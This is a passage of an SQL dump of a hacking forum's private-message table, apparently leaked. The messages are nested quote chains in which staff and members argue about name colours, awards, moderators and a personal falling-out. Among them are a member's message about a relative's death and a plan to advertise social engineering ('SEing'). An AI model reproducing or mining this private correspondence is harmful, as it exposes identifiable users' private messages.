feel, because if I were you, I might be the same. Today I got a bit pissed off when you told me to come on Skype in a post. I for a moment thought you are making it public. [quote=\'Apathy\'] I understand I was just a little annoyed :3 when are you getting back? [quote=\'t3h jok3r\'] Nvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. [quote=\'Apathy\'] I like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? [quote=\'t3h jok3r\'] Read the message below and do you think I should change the username color or not? [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] [/quote] [/quote] [/quote] [/quote] [/quote]', '1346100016', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('802', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', ' Aight Sounds good and usertitle? Also I think iPod is a good user but I am not sure what to do he does not like me and thinks I am a shit admin by the way he acts. [quote=\'t3h jok3r\'] Oh OK. My bad for misunderstanding you. I understand what happened now. I can\'t use Skype till I reach USA, by the way why didn\'t you change the usertitle? [quote=\'Apathy\'] Your my friend lol I just want to talk I like skype more then pm. Also iPod does not like me:3 I was kidding and he thinks I am serious. He called you a amazing admin and I had not seen your post so I was like thanks and to me it seemed he responded rudely saying not you. So I said I am sad or something Fuck you. :) but I was not serious and he is like pmsing and I negged him saying I was sad(was going to remove it in like half an hour. But then he goes from + to - on me and pms me \"I do not like you\" yea. :3 [quote=\'t3h jok3r\'] My flight is on Saturday, 3 PM in SA which I believe is around 4 AM in the morning in USA. I will be in USA around Sunday night. I understand how you feel, because if I were you, I might be the same. Today I got a bit pissed off when you told me to come on Skype in a post. I for a moment thought you are making it public. [quote=\'Apathy\'] I understand I was just a little annoyed :3 when are you getting back? [quote=\'t3h jok3r\'] Nvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. [quote=\'Apathy\'] I like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? [quote=\'t3h jok3r\'] Read the message below and do you think I should change the username color or not? [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote]', '1346100416', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('806', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'Sorry I am a little confused of everything you said. [quote=\'t3h jok3r\'] Nope, he is just worried that why do you hate him. I said because I took some decisions without his concern. Also remember the advertising PM on HF in which you have to change your username. [quote=\'Apathy\'] Aight Sounds good and usertitle? Also I think iPod is a good user but I am not sure what to do he does not like me and thinks I am a shit admin by the way he acts. [quote=\'t3h jok3r\'] Oh OK. My bad for misunderstanding you. I understand what happened now. I can\'t use Skype till I reach USA, by the way why didn\'t you change the usertitle? [quote=\'Apathy\'] Your my friend lol I just want to talk I like skype more then pm. Also iPod does not like me:3 I was kidding and he thinks I am serious. He called you a amazing admin and I had not seen your post so I was like thanks and to me it seemed he responded rudely saying not you. So I said I am sad or something Fuck you. :) but I was not serious and he is like pmsing and I negged him saying I was sad(was going to remove it in like half an hour. But then he goes from + to - on me and pms me \"I do not like you\" yea. :3 [quote=\'t3h jok3r\'] My flight is on Saturday, 3 PM in SA which I believe is around 4 AM in the morning in USA. I will be in USA around Sunday night. I understand how you feel, because if I were you, I might be the same. Today I got a bit pissed off when you told me to come on Skype in a post. I for a moment thought you are making it public. [quote=\'Apathy\'] I understand I was just a little annoyed :3 when are you getting back? [quote=\'t3h jok3r\'] Nvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. [quote=\'Apathy\'] I like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? [quote=\'t3h jok3r\'] Read the message below and do you think I should change the username color or not? [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote]', '1346101350', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('822', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Also', '0', '[quote=\'iTzIpod\'] [quote=\'Apathy\'] Do to think I was serious? I was going to remove it.... Also the Fu was not serious either. [/quote] I don\'t care. I still dislike you. [/quote] Aight can you name why?', '1346101965', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('827', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Also', '0', '[quote=\'iTzIpod\'] [quote=\'Apathy\'] [quote=\'iTzIpod\'] [quote=\'Apathy\'] Do to think I was serious? I was going to remove it.... Also the Fu was not serious either. [/quote] I don\'t care. I still dislike you. [/quote] Aight can you name why? [/quote] It just do. I don\'t like your LQ posts. And also your attitude. [/quote] For a mod you sure talk big. Ask joker I think you are a good member and my attitude is not actaully bad. So you maybe do not like me but you do not actually know me.', '1346102249', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('829', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg', '1346102309', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('832', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', 'Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote]', '1346104025', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('835', '67', '67', '1', 'a:1:{s:2:\"to\";a:5:{i:0;s:2:\"82\";i:1;s:2:\"61\";i:2;s:2:\"67\";i:3;s:2:\"54\";i:4;s:2:\"53\";}}', '5', 'Threads', '0', 'I was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. ', '1346104102', '0', '1', '0', '1', '0', '0', '1346142076'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('840', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', 'Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards? [quote=\'t3h jok3r\'] 2. Your joke sounded too serious and your neg rep made it look you were deadass. 2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. [quote=\'Apathy\'] Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote] [/quote] [/quote]', '1346104684', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('843', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards? [quote=\'t3h jok3r\'] 2. Your joke sounded too serious and your neg rep made it look you were deadass. 2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. [quote=\'Apathy\'] Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote] [/quote] [/quote] [/quote] Yes because you can\'t add awards just like that. You have to provide valid reasons. [/quote] Dude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf...', '1346105119', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('846', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards? [quote=\'t3h jok3r\'] 2. Your joke sounded too serious and your neg rep made it look you were deadass. 2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. [quote=\'Apathy\'] Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote] [/quote] [/quote] [/quote] Yes because you can\'t add awards just like that. You have to provide valid reasons. [/quote] Dude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf... [/quote] Dude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I? [/quote] True I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. ', '1346105906', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('849', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards? [quote=\'t3h jok3r\'] 2. Your joke sounded too serious and your neg rep made it look you were deadass. 2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. [quote=\'Apathy\'] Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote] [/quote] [/quote] [/quote] Yes because you can\'t add awards just like that. You have to provide valid reasons. [/quote] Dude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf... [/quote] Dude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I? [/quote] True I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. [/quote] It\'s OK. Actually I don\'t think you have any threads in the graphics section, you have only in the SEing section. [/quote] graphics: http://l33thacking.com/showthread.php?tid=237 se: http://l33thacking.com/showthread.php?tid=21 http://l33thacking.com/showthread.php?tid=5', '1346106406', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('852', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards? [quote=\'t3h jok3r\'] 2. Your joke sounded too serious and your neg rep made it look you were deadass. 2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. [quote=\'Apathy\'] Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote] [/quote] [/quote] [/quote] Yes because you can\'t add awards just like that. You have to provide valid reasons. [/quote] Dude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf... [/quote] Dude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I? [/quote] True I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. [/quote] It\'s OK. Actually I don\'t think you have any threads in the graphics section, you have only in the SEing section. [/quote] graphics: http://l33thacking.com/showthread.php?tid=237 se: http://l33thacking.com/showthread.php?tid=21 http://l33thacking.com/showthread.php?tid=5 [/quote] God. I said you only have in the SEing section that\'s why I readded the SE award. You need to have some tutorials or something to get the painter award or show more than 3 artworks of yours with your UID or Username. [/quote] Why use the term god?', '1346107591', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('890', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', 'Why am I elite... - [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards? [quote=\'t3h jok3r\'] 2. Your joke sounded too serious and your neg rep made it look you were deadass. 2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. [quote=\'Apathy\'] Why did I mess up? Why would I need his help? I am lost. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Change your HF usertitle to the following \"Wana learn SEing? PM me\" [/quote] http://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg [/quote] I can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. [/quote] [/quote] [/quote] [/quote] Yes because you can\'t add awards just like that. You have to provide valid reasons. [/quote] Dude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf... [/quote] Dude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I? [/quote] True I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. [/quote] It\'s OK. Actually I don\'t think you have any threads in the graphics section, you have only in the SEing section. [/quote] graphics: http://l33thacking.com/showthread.php?tid=237 se: http://l33thacking.com/showthread.php?tid=21 http://l33thacking.com/showthread.php?tid=5 [/quote] God. I said you only have in the SEing section that\'s why I readded the SE award. You need to have some tutorials or something to get the painter award or show more than 3 artworks of yours with your UID or Username. [/quote] Why use the term god? [/quote] Nvm, By the way I\'m changing the username colors, stars and userbars around so if any question pops up then let them know also it can take up to 2 hours because I\'m making the userbars as well. [/quote]', '1346121902', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('892', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'I cannot', '0', 'You are my best friend online I cannot believe this. :\'(', '1346122033', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('894', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'And', '0', 'You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.', '1346122267', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('898', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', 'Hey man, I\'m sorry I haven\'t been extremely active this week, It\'s because of college and things, Ill try my best to make alot of threads this week. More give away\'s things like that.', '1346135984', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('901', '67', '67', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'hey', '0', 'i need a free usa vps ??? do you have?', '1346146107', '0', '3', '1346146373', '1', '0', '0', '1346146256'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('904', '67', '54', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Sin Cara\'] i need a free usa vps ??? do you have? [/quote] Hey :) I only know about One free vps, but i dont know where its located, and its Linux <.<', '1346146373', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('905', '67', '67', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: hey', '0', '[quote=\'HoverCatz\'] [quote=\'Sin Cara\'] i need a free usa vps ??? do you have? [/quote] Hey :) I only know about One free vps, but i dont know where its located, and its Linux <.< [/quote] link????', '1346146412', '0', '3', '1346146553', '1', '0', '0', '1346146458'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('908', '67', '54', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Sin Cara\'] [quote=\'HoverCatz\'] [quote=\'Sin Cara\'] i need a free usa vps ??? do you have? [/quote] Hey :) I only know about One free vps, but i dont know where its located, and its Linux <.< [/quote] link???? [/quote] https://chunkhost.com/', '1346146553', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('909', '67', '67', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: hey', '0', '[quote=\'HoverCatz\'] [quote=\'Sin Cara\'] [quote=\'HoverCatz\'] [quote=\'Sin Cara\'] i need a free usa vps ??? do you have? [/quote] Hey :) I only know about One free vps, but i dont know where its located, and its Linux <.< [/quote] link???? [/quote] sorry i need vpn not vps!!! https://chunkhost.com/ [/quote]', '1346146782', '0', '3', '1346149043', '1', '0', '0', '1346149000'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('912', '67', '54', '67', 